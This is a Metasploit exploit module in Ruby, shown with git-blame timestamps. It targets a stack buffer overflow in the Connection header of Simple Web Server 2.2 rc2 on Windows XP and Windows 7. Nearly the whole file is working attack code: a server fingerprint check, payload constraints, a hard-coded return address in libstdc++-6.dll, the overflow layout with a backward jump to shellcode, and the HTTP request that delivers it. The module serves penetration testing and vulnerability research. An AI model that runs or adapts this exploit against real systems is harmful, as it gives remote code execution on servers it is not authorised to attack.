metasploit-framework/modules/exploits/windows/http/sws_connection_bof.rb

96 lines
2.7 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
2013-08-30 21:28:54 +00:00
Rank = NormalRanking
2013-08-30 21:28:54 +00:00
HttpFingerprint = { :pattern => [ /PMSoftware-SWS/ ] }
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::HttpClient
2013-08-30 21:28:54 +00:00
def initialize(info={})
super(update_info(info,
'Name' => "Simple Web Server Connection Header Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user
can send a long string data in the Connection Header to causes an overflow on the
stack when function vsprintf() is used, and gain arbitrary code execution. The
module has been tested successfully on Windows 7 SP1 and Windows XP SP3.
},
'License' => MSF_LICENSE,
'Author' =>
[
'mr.pr0n', # Vulnerability Discovery and PoC
'juan vazquez' # Metasploit module
],
'References' =>
[
['OSVDB', '84310'],
['EDB', '19937'],
['URL', 'http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/']
],
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d",
'Space' => 2048,
'DisableNops' => true,
'PrependEncoder' => "\x81\xC4\x60\xF0\xFF\xFF", # add esp, -4000
},
'DefaultOptions' =>
{
'EXITFUNC' => "process",
},
'Platform' => 'win',
'Targets' =>
[
[
'SimpleWebServer 2.2-rc2 / Windows XP SP3 / Windows 7 SP1',
{
'Ret' => 0x6fcbc64b, # call edi from libstdc++-6.dll
'Offset' => 2048,
'OffsetEDI' => 84
}
]
],
'Privileged' => false,
'DisclosureDate' => "Jul 20 2012",
'DefaultTarget' => 0))
end
2013-08-30 21:28:54 +00:00
def check
res = send_request_raw({'uri'=>'/'})
if res and res.headers['Server'] =~ /PMSoftware\-SWS\/2\.[0-2]/
return Exploit::CheckCode::Appears
2013-08-30 21:28:54 +00:00
end
2012-07-22 08:34:16 +00:00
2013-08-30 21:28:54 +00:00
return Exploit::CheckCode::Safe
end
2012-07-22 08:34:16 +00:00
2013-08-30 21:28:54 +00:00
def exploit
2013-08-30 21:28:54 +00:00
sploit = payload.encoded
sploit << rand_text(target['Offset'] - sploit.length)
sploit << [target.ret].pack("V") # eip
sploit << rand_text(target['OffsetEDI'])
sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{sploit.length}").encode_string
2013-08-30 21:28:54 +00:00
print_status("Trying target #{target.name}...")
2013-08-30 21:28:54 +00:00
connect
2013-08-30 21:28:54 +00:00
send_request_cgi({
'uri' => '/',
'version' => '1.1',
'method' => 'GET',
'connection' => sploit
})
2013-08-30 21:28:54 +00:00
disconnect
2013-08-30 21:28:54 +00:00
end
end